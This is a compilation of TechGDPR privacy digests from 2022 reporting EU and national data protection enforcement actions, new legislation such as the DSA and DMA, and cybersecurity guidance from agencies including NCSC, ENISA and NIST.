The EDPS reminded organisations of the meaning of the US Cloud act, which may conflict with the GDPR. The federal law that came into force in 2018 allows the US government, with a court order, to access electronically stored communication data located in a private entity subject to US law, (eg, corporate link, direct or indirect), but located overseas, providing that the data is relevant to an ongoing criminal investigation). As a result, the EDPS reconfirms the importance of seeking alternative services, such as cloud and web services based in the EU, to ensure that personal data is processed according to  EU law.

Sweden’s privacy regulator IMY has allowed a bank to handle personal data relating to violations of the law in cases of money laundering and the financing of terrorism when there is no legal support for the processing. Such control may be necessary for a bank to prevent a customer whose customer relationship has been terminated in one branch from being able to turn to another one within the group. Private companies must apply for permission from IMY for such processing to be allowed. Similarly, the IMY gives companies that offer background checks permission to handle personal data related to legal violations in some instances, (eg, fraud and economic crime, tax crimes and embezzlement crimes, criminal violations of individual job seekers and consultants, and persons with senior positions or controlling influence in the business).

The French regulator CNIL published a “checklist” of compliance, (in French), for health data warehouses. It can be used by anyone wishing to set up a data warehouse in the health field. It goes through the various requirements in the form of statements that data controllers judge to be true, false, or not applicable. Any processing that does not comply with all the requirements defined by the repository must be the subject of specific authorisation from the CNIL before being implemented, (by using “declare a file” on the CNIL website). An action plan to bridge any gaps between the envisaged treatment and the requirements of the reference framework can thus be drawn up on this basis. 

Investigations and enforcement actions: one-stop-shop complaints, unlawfully communicated e-mail addresses and health data, predatory direct marketing, unreported data breach, and ethical hacking

The Irish data protection commission, (DPC), issued a report providing a detailed fact-based overview and statistical analysis of its handling of One-Stop-Shop complaints in the period May 2018 to end of 2021. The DPC has received almost 20,000 complaints since the GDPR came into force, and over 17,000 have been concluded. The report illustrates that:

• 1,278 valid cross-border complaints were received by the DPC: 85% as lead supervisory authority, (LSA), and 15% as a concerned supervisory authority, (CSA).
• The DPC handles 62% of cross-border complaints as the LSA, originally lodged with another supervisory authority and transferred to the DPC.
• 73% of all cross-border complaints handled by the DPC as the LSA have been concluded.
• Most cross-border complaints handled by the DPC as the LSA were resolved through amicable resolution in the complainant’s favour.
• 87% of all cross-border complaints handled by the DPC as the LSA relate to just 10 data controllers.
• 48% of complaints transferred by the DPC to other EU/EEA LSAs ,(excluding the UK), have been concluded.

The Hungarian data protection authority NAIH issued a fine to the National Health Insurance Fund management after receiving an individual complaint. The fund’s website vaksinareg.neak.gov.hu had “published” the information that the complainant had registered for their Covid-19 vaccination. Anyone knowing their social security number and date of birth could confirm the validity of the registration of the person concerned. In this context, the complainant contested why the respondent did not send the query result only to the e-mail address for example. The fund management also failed to respond to the subject access request, (when and from which IP address the query was made), as well as cooperation obligations during the regulator’s inspection. 

Meanwhile the Italian privacy regulator ‘Garante’ fined a US company, (Senseonics), 45,000 euros for violations of personal data in the use of its glucose monitoring system and for having unlawfully communicated e-mail addresses and health data of about 2000 Italian diabetic patients. The company notified the SA of a data breach due to an employee’s sending – as part of an information campaign – email messages with the recipients’ addresses in the ‘Cc’ field rather than in the ‘Bcc’ one. This enabled every recipient to view the other recipients’ email addresses. The messages contained ‘data disclosing health’; accordingly, they could only be disclosed to third parties based on the data subjects’ written authorisation or on other appropriate legal grounds. The inquiries by ‘Garante’ shed light on additional infringements caused by the glucose monitoring system being offered. After downloading the app, users were expected to accept, with a single click, the terms of use of the service jointly with the contents of the privacy policy. This prevented them from giving their consent separately to the individual processing operations including the processing of health-related data.

The UK’s ICO has fined Easylife Ltd 1,350,000 pounds for using the personal information of 145,400 customers to predict their medical condition and target them with health-related products without their consent. The company was also fined 130,000 pounds for making 1,345,732 predatory direct marketing calls. The ICO investigation found that when a customer purchased a product from Easylife’s Health Club catalog, the company would make assumptions about their medical condition and then market health-related products without their consent. If a person bought a jar opener or a dinner tray, Easylife would use that purchase data to assume that person has arthritis and then call the individual to market glucosamine joint patches.

The Spanish data protection authority AEPD decided to sanction BAYARD REVISTAS on insufficient risk analysis, technical and organisational measures, and unreported data breach notification after receiving a complaint. The complaining party informed the agency that they received an email from the person in charge of the web portal, informing them of the unauthorised access to the database, (BAYARD being responsible), by an unauthorised third party. According to the email, the location and contact data of the people who had provided their information on the website through the registration form were involved. The attack reportedly had not been carried out for malicious purposes, but with the intention of ethical hacking. The number of affected people matched the total number of users of the web portal, around 464,762. After the incident, the person in charge claimed to have solved all the vulnerabilities that made the attack possible, had implemented the protocols to follow in the event of an incident related to data protection and had adopted a series of measures, including the encryption of the stored information. 

Data security: online accounts protection, “think before you click”

The UK National Cyber Security Centre, (NCSC), published tailored advice to support online retailers, hospitality providers, and utility services to protect themselves and their customers from cybercriminals. The guidance encourages organisations to add an extra layer of security on top of passwords to authenticate customers. Organisations are also advised what steps to take if their brand has been spoofed online. Buyer authentication methods and malicious websites takedown guidance are the latest additions to the advice package. The NCSC encourages the public and small businesses to adopt six behaviours to protect their online accounts and devices:

• Use a strong and separate password for your email
• Create strong passwords using 3 random words
• Save your passwords in your browser
• Turn on the two-step verification
• Update your devices and apps
• Back up your data

“Think before you click” (#ThinkB4UClick). This is the message during the EU’s information security month, which falls in October every year. The Swedish data protection authority IMY repeats some tips for businesses on how they can protect their most important information. Reasonable security imposes costs, in time, money, and resources. It requires long-term and persistent work and ongoing prioritisation. Good security – whether it’s data and privacy protection, information security, or cyber security – is a central issue for top management. It usually requires collaboration between many roles and competencies:

• Establish systematic security work – security testing.
• Backup – a working backup can be your only salvation if the worst happens!
• Use anti-malware software.
• Keep systems and software in all equipment up to date, to reduce the risk of vulnerabilities being exploited.
• Train the staff – on an ongoing basis – to maintain a high awareness of the risks.

Big Tech: Meta Ireland inquiry, Facebook and Google settlements, Equifax and Experian data practices, Uber’s former chief security officer’s criminal obstruction, Optus breach outcomes

The Irish data protection commission has submitted a draft decision in a large-scale inquiry into Meta Platforms Ireland Limited to other concerned EU supervisory authorities. An inquiry was opened in 2021 after media reports highlighted that a collated dataset of Facebook user personal data, approx. 533 million Facebook users worldwide, had been made available on the internet. The inquiry concerned the question of Meta’s compliance with its obligations under Art. 25 of the GDPR, (“data protection by design and by default”). Other concerned supervisory authorities have one month to review the draft decision.

Following a significant data breach at Optus, the nation’s second-largest mobile operator, Australia recommended a change of consumer privacy legislation to aid targeted data sharing between telecommunications companies and banks. With the new rules, telcos will be able to provide banks with government-issued identity cards so that banks may adopt improved monitoring for clients affected by data breaches. Through already-in-place industry reporting systems, such as fraud information exchanges, the proposed reforms will also enable enhanced fraud detection in the more significant financial services sector. Banks are supposed to erase the information they get when they no longer need it. They are only permitted to use it to prevent or address cybersecurity problems, fraud, scams, or identity theft. 

In a letter to the FTC that Reuters reviewed, the European Commission was encouraged to look into how data brokers like Equifax and Experian had accumulated payroll details about most Americans. To assist lenders, landlords, and hiring managers with background checks on potential candidates, businesses like Equifax have been acquiring employee employment histories and salary data from employers for decades. However, privacy campaigners claim that these sizable databases are prone to fraud and inaccuracy and that sometimes employees are shocked to learn that their information is included. According to Equifax, it abides by all legal requirements and encourages new voices in the sector.

Uber’s former chief security officer, Joe Sullivan, was found of criminal obstruction for failing to report a 2016 cybersecurity incident to authorities. According to the Guardian, the case was being watched as an important precedent regarding the culpability of individual security staffers and executives when handling cybersecurity incidents. In 2018, Uber paid 148 mln dollars to settle claims by all 50 US states and Washington DC that it was too slow to disclose the hacking. The case affected the data of 57 million passengers and drivers.

Finally, Meta and Google recently settled a couple of significant privacy actions in the US:

• Illinois residents involved in a class-action lawsuit against Google will receive 154 dollars each as part of a 100 million dollar settlement. The class of roughly 420,000 people who brought the lawsuit argued Google Photos’ face grouping tool violated the state Biometric Information Privacy Act.
• Facebook parent Meta has settled a lawsuit against two companies that had engaged in data scraping operations, which had seen them gathering data from Facebook and Instagram users for marketing intelligence purposes. 
• Arizona’s Attorney General announced an 85 million dollar settlement with Google related to alleged user tracking via location data from smartphones despite users disabling the tracking settings.

The post Data protection & privacy digest 27 Sept – 11 Oct 2022: New EU-US data privacy framework is now under EU legislators’ microscope appeared first on TechGDPR.

Legal processes: DSA and DMA, China’s data exporters, ransom payments, CASPs

Last week, the European Parliament adopted the new Digital Services Act (DSA) and Digital Markets Act (DMA), following a deal reached between Parliament and Council. The two bills aim to address the societal and economic effects of the tech industry by setting clear standards for how they operate and provide services in the EU, in line with the EU’s fundamental rights and values. The DSA sets clear obligations for digital service providers, such as social media or marketplaces, to tackle the spread of illegal content, online disinformation and other societal risks. These requirements are proportionate to the size and risks platforms pose to society. The new obligations include:

• New measures to counter illegal content online and obligations for platforms to react quickly, while respecting fundamental rights, including the freedom of expression and data protection.
• Strengthened traceability and checks on traders in online marketplaces to ensure products and services are safe; including efforts to perform random checks on whether illegal content resurfaces.
• Increased transparency and accountability of platforms, for example by providing clear information on content moderation or the use of algorithms for recommending content, (so-called recommender systems); users will be able to challenge content moderation decisions.
• Bans on misleading practices and certain types of targeted advertising, such as those targeting children and ads based on sensitive data. So-called “dark patterns” and misleading practices aimed at manipulating users’ choices will also be prohibited.
• Very large online platforms and search engines, (with 45 million or more monthly users), which present the highest risk, will have to comply with stricter obligations, enforced by the Commission, (preventing systemic risks, independent audits). They will also have to facilitate access to their data and algorithms to authorities and vetted researchers.

At the same time, the DMA sets obligations for large online platforms acting as “gatekeepers”, (platforms whose dominant online position make them hard for consumers to avoid), on the digital market to ensure a fairer business environment and more services for consumers. To prevent unfair business practices, those designated as gatekeepers will have to:

• allow third parties to inter-operate with their own services, meaning that smaller platforms will be able to request that dominant messaging platforms enable their users to exchange messages, send voice messages or files across messaging apps. This will give users greater choice and avoid the so-called “lock-in” effect where they are restricted to one app or platform;
• allow business users to access the data they generate in the gatekeeper’s platform, to promote their own offers and conclude contracts with their customers outside the gatekeeper’s platforms.

Gatekeepers can no longer:

• Rank their own services or products more favourably, (self-preferencing), than other third parties on their platforms;
• Prevent users from easily un-installing any pre-loaded software or apps, or using third-party applications and app stores;
• Process users’ personal data for targeted advertising, unless consent is explicitly granted.

Once formally adopted by the Council in July, (DMA), and September, (DSA), both acts will be published in the EU Official Journal and enter into force twenty days after publication. Their application will start through 2023-2024. 

Meanwhile, China’s cyberspace regulator, (CAC), clarified that rules requiring data exports to undergo security reviews would be effective from Sept. 1, the first time it has given a start date for a new regulatory framework that will affect hundreds, if not thousands, of Chinese companies, Reuters reports. The measures, according to Data Guidance’s report, provide the cases in which a data exporter must submit a data exit security assessment to the CAC through the provincial cybersecurity and informatisation department where:

• the data processor provides important data overseas;
• the data processor is a critical information infrastructure operator and the data processor processes the personal information of more than 1 million people;
• the data processor processes the personal information of 100,000 people or the sensitive information of 10,000 people since 1 January of the previous year; or
• other situations required to declare data export security assessments as provided by the CAC.

The data export security assessment adheres to the combination of prior assessment and continuous supervision, and the combination of risk self-assessment and security assessment. In addition, the measures outline that a data processor’s pre-assessment should focus on, among other things, the responsibilities and obligations that overseas recipients are subject to, the risk of data being tampered, destroyed, or leaked, and whether data export related contracts fully stipulate the responsibility and obligation of data security protections. The full legal text, (in Chinese), is available here. 

The UK National Cyber Security Centre, (NCSC), and Information Commissioner’s Office, (ICO), say it is incorrect for organisations to assume paying ransoms is a) the right thing to do and they do not need to engage with the ICO as a regulator, or b) will gain benefit from it by way of reduced enforcement. Thus both organisations in a joint statement advise solicitors not to advise clients to pay ransomware demands should they fall victim to a cyber-attack. Paying ransoms to release locked data does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered as a reasonable step to safeguard data.

The European Parliament and Council negotiators also reached a provisional deal on a new bill aiming to ensure that crypto transfers, (like bitcoins and electronic money tokens), can always be traced and suspicious transactions blocked. The legislation is part of the new EU anti-money laundering package and will be aligned with the Markets in Crypto-assets rules, (MiCA). The agreement extends the so-called “travel rule”, already existing in traditional finance, to cover transfers in crypto assets. This rule requires that: 

• Information on the source of the asset and its beneficiary travels with the transaction and is stored on both sides of the transfer. 
• Crypto-assets service providers, (CASPs), will be obliged to provide this information to competent authorities if an investigation is conducted into money laundering and terrorist financing.
• There are no minimum thresholds nor exemptions for low-value transfers, as originally proposed. Regarding protecting personal data, including a name and an address required by the travel rule, negotiators agreed that if there is no guarantee that privacy is upheld by the receiving end, such data should not be sent.
• Before making the crypto-assets available to beneficiaries, providers will have to verify that the source of the asset is not subject to restrictive measures or sanctions, and there are no risks of money laundering or terrorism financing.

The rules would also cover transactions from so-called un-hosted wallets, (a crypto-asset wallet address that is in the custody of a private user,) when they interact with hosted wallets managed by CASPs. In case a customer sends or receives more than 1000 euros to or from their own un-hosted wallet, the CASP will need to verify whether the un-hosted wallet is effectively owned or controlled by this customer. The rules do not apply to person-to-person transfers conducted without a provider, such as bitcoin trading platforms, or among providers acting on their own behalf.

Official guidance: employees location, insurance applications, local authorities, commercial interest vs. consent

The Finnish data protection ombudsman asked service providers in the public sector for a report on use of the location data function in computers used by employees in the municipal sector. The background for the report was a notification of a data security breach filed by a hospital district, when settings that allowed the collection of location data were switched on in employees’ Windows 10 workstations and remote work laptops, although there was no intention to collect the data. As a result, the regulator found that:

• The hospital district did not have a need required by law for processing employees’ location data.
• The hospital district did not appropriately review what data it intended to collect. 
• Since the employees’ location data were unnecessary for the employer and collected unintentionally, these data should not have been processed. In order to ensure data protection by default, the hospital district should have reviewed the basic settings of the system and noticed that the location function was switched on before deploying the workstations. 
• Since the location function was switched on, employees’ personal data were delivered to Microsoft as well.

The regulator ordered the erasure of any historical data, location logs and other personal data created during use of the location data function. 

The Finnish ombudsman has also investigated the procedures of insurance companies when they request the health information of insurance applicants and insured persons from health care providers in order to determine the insurance company’s responsibility. Deficiencies were found, especially in the appropriate demarcation of the information requested from the health care provider and in the legality of processing. The insurance companies justified the processing of the policy applicant’s health data on the grounds of data protection, according to which the insurance institution can process client or claimant’s health data that is necessary to determine the liability of the insurance institution.

The regulator states that the provision of the data protection law in question only applies to the processing of the data of the insured and the claimant. Insurance companies cannot process the insurance applicant’s health information or request personal information from the health care provider during the insurance application phase, based on the regulations, because the contract has not yet been concluded. It is possible to process health data under certain conditions if the person has given valid consent. However, it requires that the person is told precisely what information is collected about them and for what purposes it is used. Asking for consent in a general way without detailing the information and purposes of use therefore does not meet the requirements of the data protection regulation.

The French data protection regulator CNIL published a guide on the obligations and responsibilities of local authorities with regard to data protection. The study was conducted at the end of 2021. Focusing on communities smaller than 3,500 inhabitants, which represent 91% of municipalities in France, this study aimed to understand digital usage, identify risks/obstacles and data needs. It appeared that the majority of respondents are not aware of the legal framework in force, with the exception of the GDPR. The provisions relating to competences and responsibilities in the field of digital security are little or not known to local elected officials and territorial agents, who consider cybersecurity regulations to be particularly complex.

The purpose of this guide is to inform local elected officials and territorial agents about the obligations related to: a) the protection of personal data; b) the implementation of local teleservices; c) hosting of health data. This guide also recalls the different types of legal liability to which local authorities and their public institutions are exposed in the event of cyberattacks and damage related to: administrative responsibility, civil liability, criminal liability.

The European Commission says that the Dutch data protection authority AP is hindering free enterprise in the EU by interpreting privacy legislation too strictly. The legal battle refers to the dispute between the AP and streaming service VoetbalTV. The service broadcasted video images of amateur matches via the internet for, among others, players, trainers and fans. More than 150 clubs used it, until the AP imposed a fine of 575,000 euros on the service in  2019. Football TV then went bankrupt.

According to the AP, the profit motive of the company could never constitute a ‘legitimate interest’ for the broadcasting of the images without the individual consent of players and the public. According to Brussels, the Dutch supervisory authority did not strike the right balance between the right to data protection on the one hand and the freedom of undertaking on the other. Additionally, in 2020, a Dutch court reportedly ruled that VoetbalTV did not have to pay the fine, as personal data may sometimes also be processed when there is only a commercial interest. The AP had appealed against this decision.

Investigations and enforcement actions: website security, data protection requests, employment certificate, cookies, account deletion, health data

As part of one of its priority themes, “the cybersecurity of the French web”, the CNIL has carried out a series of online checks of twenty-one websites of French public sector bodies, (municipalities, university hospitals, ministries, etc.), and the private sector, (e-commerce platforms, IT solution providers, etc.). The verifications carried out by the CNIL therefore focused mainly on technical and organisational flaws: 

• unsecured access, (HTTP), to websites, (many actors), implemented obsolete versions of the TLS protocol to ensure the security of data in transit, used certificates and non-compliant cryptographic suites for exchanges with the servers of controlled sites;
• lack of devices to trace abnormal connections to servers;
• use of insufficiently robust passwords and procedures to renew them that do not sufficiently secure their transmission and retention.

The bodies on notice have a period of three months to take any measure to ensure an appropriate level of security.

The Finnish company Otavamedia was penalised for shortcomings in the implementation of data protection rights. Between 2018 and 2021, eleven cases concerning Otavamedia were brought to the office of the data protection commissioner. Among other things, the complainants had not received an answer to their requests or inquiries regarding data protection rights. According to the report provided by Otavamedia, some of the data protection requests had not been implemented due to a technical problem with the e-mail control in connection with the change of digital service providers. During the error situation, the messages that arrived in the e-mail box reserved for data protection matters were not forwarded to the customer service staff. The situation was discovered only after the data protection authority’s request for clarification. 

Otavamedia should have taken care to test the e-mail box, as it is the main electronic contact channel of data subjects in data protection matters. Additionally, the registrants had the opportunity to make requests to Otavamedia regarding their own information using a printable form. The person’s signature was required on the form for identification purposes. The regulator considers that with this method of operation, Otavamedia collected an unnecessarily large amount of data for identification purposes. Otavamedia does not process signature information in other contexts, which is why it was not possible, for example, to compare signatures with previously held information.

In the first half of 2022, the Czech office for personal data protection UOOU monitored compliance with the GDPR in connection with the setting of the processing of cookie files by various operators of web portals and pages, based on both complaints received and the monitoring plan. Among the main shortcomings detected by the regulator are: 

• Use of non-technical cookies without consent.
• A disproportionately long period of validity of cookies in relation to their purpose.
• Absence of the choice for expressing disagreement with the non-technical cookies in the first layer of the cookie bar.
• Wrong categorisation of cookies.
• Absence of information about specific cookies used.
• The difference in the visibility of the consent and non-consent buttons for the use of non-technical cookies.
• Information about cookies in a foreign language.
• The cookie bar makes it difficult or impossible to read the website.

The Polish supervisory authority UODO was notified of potential inaccuracies related to the processing of personal data by a manufacturing company, (Esselmann Technika Pojazdowa). The company made an informed decision not to notify a breach involving an important document of one of its employees to the supervisory authority, despite the letters addressed to it indicating a possible risk to the rights or freedoms of the persons concerned in this case. In the course of explanatory actions by the regulator the loss of a document from the personal file of a company employee – an employment certificate – was revealed. The certificate of employment contains a lot of important information about the person, including:

• the period(s) of employment;
• the procedure and legal basis for the termination or expiry of the employment relationship;
• parental and child care leave taken;
• information on the amount of remuneration and qualifications obtained – at the employee’s request;
• information on enforcement seizure of remuneration.

Taking the above into account, the Polish regulator imposed a fine of approx 3,500 euros.

The Irish data protection authority DPC published its recent decision concerning Twitter International Company. In 2019, the complainant alleged that, following the suspension of their Twitter account, Twitter failed to comply with an erasure request they had submitted to it within the statutory timeframe. Further, the complainant alleged that Twitter had requested a copy of their photographic ID in order to action their request without a legal basis to do so. Finally, the complainant alleged that Twitter had retained their personal data following their erasure request without a legal basis to do so.

While the complaint was lodged directly with the DPC by an individual who resides in the UK, the DPC considered that the nature of the data processing operations complained of could have a substantial effect, and that the type of processing meets the definition of cross border processing. As a result, the DPC ordered Twitter, pursuant to Article 58 of the GDPR, to revise its internal policies and procedures for handling erasure requests to ensure that data subjects are no longer required to provide a copy of photographic ID when making data erasure requests, unless it can demonstrate a legal basis for doing so. 

Data relating to health enjoys enhanced protection and, subject to the exceptions provided for by the law, dissemination is prohibited. Administrative transparency cannot violate people’s privacy. For these reasons, the Italian privacy regulator ‘Garante’ sanctioned the Roma local health authority 46,000 euros. It had published in clear text on its website all the names and data relating to the health of the subjects who had requested civic access in 2017 and 2018. In most cases, the documents concerned the health records of the persons concerned, including medical records, disability assessments, tests, technical reports, etc. The first serious violation detected by the Authority, which took action ex officio, was therefore the dissemination of data on the health of the subjects concerned, information relating to both their physical and mental state, including the provision of health care services.

Data security: cybersecurity threat landscape

The European Union Agency for Cybersecurity provided simple steps to map the cybersecurity threat landscape. The methodology aims at promoting consistent and transparent threat intelligence sharing across the EU, (including but not limited to public bodies, policy makers, cybersecurity experts, industry, vendors, solution providers, SMEs). The framework is based on the different elements considered in the performance of the cybersecurity threat landscape analysis. It therefore includes the identification and definition of the process, the methods and tools used as well as the stakeholders involved. Building on the existing modus operandi, this methodology provides directions on the following:

• defining components and contents of each of the different types of CTL;
• assessing the target audience for each type of CTL to be performed;
• how data sources are collected;
• how data is analysed;
• how data is to be disseminated;
• how feedback is to be collected and analysed.

The methodology consists of six main steps with predicted feedback and associated to each of these steps: direction, collection, processing, analysis and production, dissemination, feedback. You can download the the full methodology guide here.

Big Tech: Apple’s new lockdown mode, Chinese CCTV in UK

Apple’s latest iOS 16 security tool can defend against a state-sponsored cyberattack on your iPhone, cnet.com reports. In short, new Lockdown Mode increases security capabilities on iOS 16, iPadOS 16, and macOS Ventura by limiting certain functions that may be vulnerable to attack: 

• Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
• Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
• Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
• Wired connections with a computer or accessory are blocked when iPhone is locked.
• Configuration profiles cannot be installed, and the device cannot enrol into mobile device management, (MDM), while Lockdown Mode is turned on.

Meanwhile, a cross party group of UK MPs have called for a ban on two Chinese surveillance camera brands widely used in Britain, according to Yahoo News. The AI-enabled cameras are capable of facial detection, gender recognition and behavioural analysis and offer advanced features such as identifying fights or if someone is wearing a face mask. The two brands — Hikvision and Dahua — are widely used by government bodies in the UK, by 73% of councils across the UK, 57% of secondary schools in England, and six out of 10 NHS Trusts. Reportedly, Hikvision and Dahua are now banned from trading in the US over security concerns and evidence of their widespread use in so-called “re-education” camps in China. The MP’s call for action also includes “an independent national review of the scale, capabilities, ethics and rights impact of modern CCTV in the UK”.

The post Weekly digest 4 – 10 July 2022: DSA and DMA adopted, setting standards on EU digital service providers appeared first on TechGDPR.

Legal processes: EU Digital Strategy, IoT, biometrics policing program, US surveillance ads

The EU Parliament moved on the implementation of the Digital Services Act, (part of the EU Digital Strategy), that regulates platforms for a safer online space for users. MEPs gave the green light to open negotiations with member states. The Parliament introduced several changes to the Commission’s proposal, exempting micro and small enterprises from certain obligations, including on:

• Targeted advertising: more transparent and informed choice for the recipients of digital services, including information on how their data will be monetised. 
• Refusing consent shall be no more difficult or time-consuming than giving consent. 
• If their consent is refused or withdrawn, recipients shall be given other options to access the online platform, including “options based on tracking-free advertising”.
• Targeting or amplification techniques involving the data of minors or special categories of data for the purpose of displaying ads will be prohibited.
• Recipients of digital services and organisations representing them must be able to seek redress for damages.
• Platforms should be prohibited from using user deceiving or nudging techniques.
• Very Large Online Platforms should provide at least one recommender system that is not based on profiling. 

The EU Commission published its latest competition sector inquiry report into the consumer Internet of Things, IoT. Among the main areas of potential concerns are:

• The role of voice assistants and smart devices as intermediaries for data generation and collection, which would allow them to control user relationships. 
• The extensive access to data, including information on user interactions with third-party smart devices and consumer IoT services by providers of voice assistants. 
• The access to and accumulation of large amounts of data allow voice assistant providers to improve their market position. 

The IoT inquiry urges companies to review their commercial practices, as its findings will inevitably add to the ongoing legislative process on the EU Digital Markets Act, (part of the EU Digital Strategy) . Read the report and the staff working document for more detailed information. 

According to Human Rights Watch, Greece’s new biometrics policing program can undermine privacy, create risks of profiling and other abuses. The police reportedly would use hand-held devices to gather biometric information, fingerprints, faces, from people on a vast scale and cross check it against police, immigration, and private sector databases primarily for immigration purposes. Human Rights watch believes that a) the Greek police should use their authority to stop people and require them to show identity documents only when based on a reasonable suspicion that the person is involved in an illegal activity, b) the police should put in place systems to check the validity of identity documents without detaining people or gathering personal biometric data. In 2019 the Greek police signed a contract with Intracom Telecom to help create the “smart policing” program. Since 2020, the Hellenic Data Protection Authority (DPA) has been investigating its lawfulness. The launch of the program was planned for 2021, but has been delayed a couple of times.

The Banning Surveillance Advertising Act was introduced in the US House of Representatives. The draft legislation prohibits advertising networks and facilitators from using personal data to target ads, with the exception of broad location targeting to a recognized place (such as a municipality). The bill also prohibits advertisers from targeting ads based on protected class status information, such as race, gender, and religion, and personal data purchased from data brokers. However, it makes explicit that contextual advertising, which is advertising based on the content a user is engaging with, is allowable. It also provides authorisations for the FTC or the state attorneys general to enforce violations of the Act. Read the full draft law here and detailed section-by-section summaries here. 

Official guidance: Bluetooth security, clinical trials Code of Conduct, the right to access, housing, processor/EU representative

The US National Institute of Standards and Technology, NIST, publishes its updated guide on Bluetooth security. Bluetooth wireless technology is used primarily to establish wireless personal area networks, and has been integrated into many types of business and consumer devices. The Bluetooth specifications define several security modes, and each version of Bluetooth supports some, but not all,  and some – do not require any security at all. The updated NIST guide provides exhaustive information on the security capabilities of Bluetooth and gives step-by-step management, technical and operational recommendations to organizations employing Bluetooth wireless technologies on securing them effectively. 

The European Federation of Pharmaceutical Industries and Associations, EFPIA, confirmed that its GDPR Code of Conduct on Clinical Trials and Pharmacovigilance has progressed to the final phase of review by data protection authorities prior to formal submission to the EDPB for approval. The EFPIA believes that a GDPR Code of conduct will:

• Enable the sector to align on key data protection positions, providing more consistency, clarity and certainty for clinical research. 
• Bring more certainty to third parties (patients, ethical committees and hospitals). 
• Clarify the linkages between the GDPR and other key sectoral legislation such as the Clinical Trials Regulation.
• Respond to the Commission’s policy ambition for the European Health Data Space to improve data governance, etc.

The EDPB adopted guidelines on the right of access that enables individuals to get knowledge on how and why their personal data is processed by organisations. Among others, the guide provides clarifications on the scope of the right of access, the information the controller has to provide to the data subject, the format of the access request, the main modalities for providing access, and the notion of manifestly unfounded or excessive requests. The Guidelines will be subject to public consultation for a period of 6 weeks and made available on the EDPB website once these have been completed.

The Bavarian data protection authority for the private sector, BayLDA, is examining the area of ​​housing management and, in particular, self-disclosure of prospective tenants, the DataGuidance reports. The BayLDA clarified that when contact is made and a viewing appointment is arranged, information about the prospective tenant’s occupation and income is not yet required. Only if the person viewing the flat continues to be interested, it is permissible to ask about the number of people moving in, the prospective tenant’s occupation and income. If at the end of the selection process the landlord would like to conclude a tenancy agreement with the person, then the submission of a self-disclosure from a credit agency may also be requested before the conclusion of the agreement.

The Croatian data protection authority AZOP analyzes the possibility for a processor to perform the role of a controller’s EU representative. The regulator states that in order to ensure that the processor in the given scenario is not in conflict in terms of two duties, it would be advisable to establish processes and practices in the work environment that will promote effective control, management and resolution of conflicts of interest, (eg, open communications and dialogues related to ethics, education of its employees). At the same time, the establishment of these procedures and excessive control of the processor, in terms of the representative’s remit, in practice could be unenforceable and counterproductive, which would result in distrust of the controller. Thus, the regulator concludes that performance of two functions in the same person would represent a possible conflict of interest, and should be prevented.

Data breaches, Investigations and Enforcement actions: aggressive telemarketing, Red Cross, demonstrators, IT solutions’ failed security

The Italian data protection authority, “Garante”, fined Enel Energia, (multinational manufacturer and distributor of electricity and gas), 26,5 mln euros for aggressive telemarketing, consumer data used without consent and failure to comply with the accountability principle. The decision was issued following hundreds of complaints by users who had received unsolicited calls, some of them based on pre-recorded messages. Others had found it difficult to exercise their data protection rights and had encountered problems handling their data in connection with the supply of utility services both on the company’s website and through the app released to manage power consumption. Enel Energia was ordered to bring all processing by its sales network into compliance with suitable arrangements, to implement further technical and organisational measures to handle data subjects’ requests, in particular, the right to object to processing for promotional purposes, and to provide feedback on those requests by no later than 30 days.

A massive cyber-attack targeted Red Cross Red Crescent data on 500,000 people. from files at an external company in Switzerland the ICRC contracts to store data. There is not yet any indication that the compromised information has been leaked or shared publicly. The attack compromised confidential information on highly vulnerable people, including those separated from their families due to conflict, migration and disaster, missing persons and their families, and people in detention. In response the ICRC had to shut down the Restoring Family Links systems. The organisation asks those responsible for the attack not to share, sell, leak or otherwise use this data.

The Portuguese data regulator CNPD fined Lisbon city municipality 1.25 mln euros in a case related to the processing of personal data of participants in demonstrations. The mayor’s office had committed 225 breaches of demonstrators’ personal data between 2018 and 2021, namely, when their details were shared with the embassies of several countries, BBC reports. More than 100 other breaches that occurred since 2012 were not covered as they pre-dated the GDPR. Some of the breaches reportedly could have attracted fines of up to 20 mln each, but the regulator had refrained from imposing these due to the effect of the pandemic on public finances. When the story broke in June 2021, the data protection officer and cabinet in charge of handling protesters’ data was dismissed, and an external audit of the city hall’s data protection policies was ordered to take place, Reuters reports.

The Maltese data protection authority, IDPC, issued its decision on the personal data breach suffered by a C-Planet (IT Solutions). In 2020 the regulator was informed about a security incident encountered by the company. The investigation concluded that C-Planet, in its capacity as controller, was processing the personal and special categories of data that were impacted by the breach, in violation of articles 5, 6, 9 and 14 of the GDPR. C-Planet failed to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk. Additionally, the controller failed to notify the breach to the regulator within the deadline and to communicate the same to the affected data subjects. The IDPC imposed a proportionate fine of 65,000 euros on the microenterprise, taking into account its turnover, and ordered the erasure of the personal data which had been processed in an unlawful manner.

Data security: C-ITS, Smart Cities, Remote identity proofing

The German Federal Office for Information Security published its Technical Guidance on Cooperative Intelligent Transport Systems, C-ITS, (available in English). Among many provisions it describes trust and privacy management concerning the establishment and maintenance of identities and cryptographic keys. Because links between a vehicle and its user can be either directly or indirectly deduced, the impact on privacy of the road users should be minimized through:

• Pseudonymity: a C-ITS station may use a resource or service without disclosing its identity but can still be accountable for that use. 
• Unlinkability: Unlinkability denotes that a C-ITS station may make multiple uses of resources or services without others being able to link them together. 

Classically, authenticity and integrity are ensured by means of a security architecture with support of a Public Key Infrastructure. In C-ITS pseudonymity and unlinkability are incorporated and balanced with integrity and authenticity by means of separation of duties and commonly changing pseudonym certificates, so-called Authorization Tickets. Read the full C-ITS guide here. 

The German Federal Office for Information Security also published its  recommendations for action on information security in Smart Cities and Smart Regions, (in German). Smart cities and regions also use the potential of digitization for municipal services of general interest, for example in the provision of services in the public interest, such as local public transport or waste disposal. Information security, especially of the underlying municipal  IoT infrastructures, is of crucial importance. The target group is municipal decision-makers and those responsible for operations, such as a chief digital officer of a municipality or a manager for a municipal IoT project. The recommendations are also structured based on the lifecycle of an IoT infrastructure . You can see the full guide here.

